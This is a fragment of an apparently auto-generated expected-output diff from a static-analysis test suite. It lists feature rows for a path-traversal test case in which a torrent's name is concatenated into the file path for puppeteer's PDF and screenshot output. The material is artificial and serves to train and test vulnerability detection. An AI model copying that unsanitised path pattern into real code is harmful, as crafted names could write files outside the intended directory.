autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | return of anonymous function | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:4:2:17:1 | return of anonymous function | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:15 | tainted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:15 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:15 | tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:15 | tainted | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:15 | tainted | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted ... t.data" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted ... t.data" | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted ... t.data" | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted ... t.data" | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:9:5:71 | tainted ... t.data" | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:24 | "dir/" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:24 | "dir/" | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:24 | "dir/" | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:24 | "dir/" | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:24 | "dir/" | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:24 | "dir/" | stringConcatenatedWith | -endpoint- parseTorrent().name + '.torrent.data' | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:53 | "dir/" ... t).name | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:53 | "dir/" ... t).name | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:53 | "dir/" ... t).name | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:53 | "dir/" ... t).name | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:53 | "dir/" ... t).name | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:71 | "dir/" ... t.data" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:71 | "dir/" ... t.data" | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:71 | "dir/" ... t.data" | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:71 | "dir/" ... t.data" | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:19:5:71 | "dir/" ... t.data" | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:39 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:39 | parseTorrent | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:39 | parseTorrent | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:39 | parseTorrent | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:39 | parseTorrent | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | exceptional return of parseTo ... orrent) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | exceptional return of parseTo ... orrent) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | exceptional return of parseTo ... orrent) | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | exceptional return of parseTo ... orrent) | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | exceptional return of parseTo ... orrent) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | parseTo ... orrent) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | parseTo ... orrent) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | parseTo ... orrent) | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | parseTo ... orrent) | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:48 | parseTo ... orrent) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:53 | parseTo ... t).name | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:53 | parseTo ... t).name | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:53 | parseTo ... t).name | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:53 | parseTo ... t).name | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:53 | parseTo ... t).name | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:28:5:53 | parseTo ... t).name | stringConcatenatedWith | 'dir/' -endpoint- '.torrent.data' | | autogenerated/TaintedPath/pupeteer.js:5:41:5:47 | torrent | CalleeFlexibleAccessPath | parseTorrent | | autogenerated/TaintedPath/pupeteer.js:5:41:5:47 | torrent | InputArgumentIndex | 0 | | autogenerated/TaintedPath/pupeteer.js:5:41:5:47 | torrent | calleeImports | parse-torrent | @@ -10416,6 +82755,137 @@ tokenFeatures | autogenerated/TaintedPath/pupeteer.js:5:41:5:47 | torrent | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | | autogenerated/TaintedPath/pupeteer.js:5:41:5:47 | torrent | enclosingFunctionName | | | autogenerated/TaintedPath/pupeteer.js:5:41:5:47 | torrent | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:50:5:53 | name | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:50:5:53 | name | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:50:5:53 | name | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:50:5:53 | name | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:50:5:53 | name | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:57:5:71 | ".torrent.data" | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:5:57:5:71 | ".torrent.data" | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:5:57:5:71 | ".torrent.data" | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:5:57:5:71 | ".torrent.data" | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:5:57:5:71 | ".torrent.data" | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:5:57:5:71 | ".torrent.data" | stringConcatenatedWith | 'dir/' + parseTorrent().name -endpoint- | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:17 | browser | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:17 | browser | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:17 | browser | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:17 | browser | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:17 | browser | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser ... aunch() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser ... aunch() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser ... aunch() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser ... aunch() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:11:7:44 | browser ... aunch() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:21:7:44 | await p ... aunch() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:21:7:44 | await p ... aunch() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:7:21:7:44 | await p ... aunch() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:21:7:44 | await p ... aunch() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:21:7:44 | await p ... aunch() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:35 | puppeteer | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:35 | puppeteer | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:35 | puppeteer | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:35 | puppeteer | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:35 | puppeteer | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:42 | puppeteer.launch | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:42 | puppeteer.launch | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:42 | puppeteer.launch | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:42 | puppeteer.launch | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:42 | puppeteer.launch | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | exceptional return of puppeteer.launch() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | exceptional return of puppeteer.launch() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | exceptional return of puppeteer.launch() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | exceptional return of puppeteer.launch() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | exceptional return of puppeteer.launch() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | puppeteer.launch() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | puppeteer.launch() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | puppeteer.launch() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | puppeteer.launch() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:27:7:44 | puppeteer.launch() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:7:37:7:42 | launch | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:7:37:7:42 | launch | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:7:37:7:42 | launch | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:7:37:7:42 | launch | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:7:37:7:42 | launch | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:14 | page | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:14 | page | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:14 | page | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:14 | page | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:14 | page | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page = ... wPage() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page = ... wPage() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page = ... wPage() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page = ... wPage() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:11:8:40 | page = ... wPage() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:18:8:40 | await b ... wPage() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:18:8:40 | await b ... wPage() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:8:18:8:40 | await b ... wPage() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:18:8:40 | await b ... wPage() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:18:8:40 | await b ... wPage() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:30 | browser | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:30 | browser | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:30 | browser | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:30 | browser | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:30 | browser | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:38 | browser.newPage | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:38 | browser.newPage | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:38 | browser.newPage | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:38 | browser.newPage | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:38 | browser.newPage | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | browser.newPage() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | browser.newPage() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | browser.newPage() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | browser.newPage() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | browser.newPage() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | exceptional return of browser.newPage() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | exceptional return of browser.newPage() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | exceptional return of browser.newPage() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | exceptional return of browser.newPage() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:24:8:40 | exceptional return of browser.newPage() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:8:32:8:38 | newPage | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:8:32:8:38 | newPage | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:8:32:8:38 | newPage | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:8:32:8:38 | newPage | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:8:32:8:38 | newPage | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:5:9:51 | await p ... 'a4' }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:5:9:51 | await p ... 'a4' }) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:9:5:9:51 | await p ... 'a4' }) | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:5:9:51 | await p ... 'a4' }) | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:5:9:51 | await p ... 'a4' }) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:14 | page | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:14 | page | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:14 | page | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:14 | page | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:14 | page | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:18 | page.pdf | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:18 | page.pdf | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:18 | page.pdf | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:18 | page.pdf | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:18 | page.pdf | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | exceptional return of page.pd ... 'a4' }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | exceptional return of page.pd ... 'a4' }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | exceptional return of page.pd ... 'a4' }) | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | exceptional return of page.pd ... 'a4' }) | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | exceptional return of page.pd ... 'a4' }) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | page.pd ... 'a4' }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | page.pd ... 'a4' }) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | page.pd ... 'a4' }) | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | page.pd ... 'a4' }) | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:11:9:51 | page.pd ... 'a4' }) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:16:9:18 | pdf | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:16:9:18 | pdf | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:9:16:9:18 | pdf | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:16:9:18 | pdf | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:16:9:18 | pdf | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:9:20:9:50 | { path: ... 'a4' } | CalleeFlexibleAccessPath | page.pdf | | autogenerated/TaintedPath/pupeteer.js:9:20:9:50 | { path: ... 'a4' } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/pupeteer.js:9:20:9:50 | { path: ... 'a4' } | calleeImports | puppeteer | @@ -10425,6 +82895,21 @@ tokenFeatures | autogenerated/TaintedPath/pupeteer.js:9:20:9:50 | { path: ... 'a4' } | enclosingFunctionName | | | autogenerated/TaintedPath/pupeteer.js:9:20:9:50 | { path: ... 'a4' } | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:9:20:9:50 | { path: ... 'a4' } | receiverName | page | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:25 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:25 | path | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:25 | path | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:25 | path | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:25 | path | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:22:9:34 | path: tainted | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:9:28:9:34 | tainted | CalleeFlexibleAccessPath | page.pdf | | autogenerated/TaintedPath/pupeteer.js:9:28:9:34 | tainted | InputAccessPathFromCallee | 0.path | | autogenerated/TaintedPath/pupeteer.js:9:28:9:34 | tainted | InputArgumentIndex | 0 | @@ -10435,6 +82920,21 @@ tokenFeatures | autogenerated/TaintedPath/pupeteer.js:9:28:9:34 | tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | | 